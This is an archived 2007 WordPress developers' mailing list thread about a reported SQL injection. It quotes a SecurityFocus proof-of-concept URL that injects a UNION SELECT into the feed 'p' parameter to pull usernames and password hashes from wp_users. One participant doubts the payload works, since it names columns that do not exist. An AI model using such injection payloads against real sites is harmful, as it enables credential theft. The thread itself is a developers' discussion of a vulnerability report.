[wp-hackers] SQL injection

Computer Guru computerguru at neosmart.net
Wed Dec 5 18:38:36 GMT 2007


It was before they invented Google, too. 

:P

-----Original Message-----
From: wp-hackers-bounces at lists.automattic.com
[mailto:wp-hackers-bounces at lists.automattic.com] On Behalf Of Andre SC
Sent: Wednesday, December 05, 2007 8:34 PM
To: wp-hackers at lists.automattic.com
Subject: Re: [wp-hackers] SQL injection

http://www.securityfocus.com/archive/1/484608/30/0/threaded

(via 
http://www.google.co.za/search?q=security+focus+wordpress+SQL+injection :)

from the post:
~~~~~~~~~~~~~~~~~~SQL Injection ~~~~~~~~~~~~

Vulnerable URL : http://localhost/path_to_wordpress/?feed=rss2&p=

Parameter : P

POC = 
http://localhost/path_to_wordpress/?feed=rss2&p=11/**/union/**/select/**
/concat(user_password,char(100),username),2/**/from/**/wp_users/**/where
/**/user_id=1/*
  ---
Author : Beenu Arora

Mail : beenudel1986 (at) gmail (dot) com [email concealed]


    *
    * <http://www.securityfocus.com/archive/1/484608>


Computer Guru wrote:
> Back in the olden days before URIs were invented, people used to go on IRC
> and email and talk about something they'd seen in the massive, huge maze
> that was the world wide web. 
>
> Because many times people had no idea exactly what tiny bit of the huge
www
> it was that someone was referring to, they invented something called a
URI,
> and it looks something like this: http://cnn.com/
>
> With this URI, it became possible for people to add a _link_ to an email
or
> IRC message so that people receiving the message would know WTF the OP was
> referring to, and see it for themselves.
>
> -CG
>
> -----Original Message-----
> From: wp-hackers-bounces at lists.automattic.com
> [mailto:wp-hackers-bounces at lists.automattic.com] On Behalf Of Stefano
> Aglietti
> Sent: Wednesday, December 05, 2007 8:02 PM
> To: wp-hackers at lists.automattic.com
> Subject: [wp-hackers] SQL injection
>
> on security focus today there is a security problme about WP, I looked
> at it and I was unable to reproduce it, and the sql query sound
> strange cause it refer to non existent colum ind user database...
>
> I suppose that even if it's a true problem it won't work for feeds
> redirected to feedburner, right?
>
> Thanks for any info.
>
>   


_______________________________________________
wp-hackers mailing list
wp-hackers at lists.automattic.com
http://lists.automattic.com/mailman/listinfo/wp-hackers



More information about the wp-hackers mailing list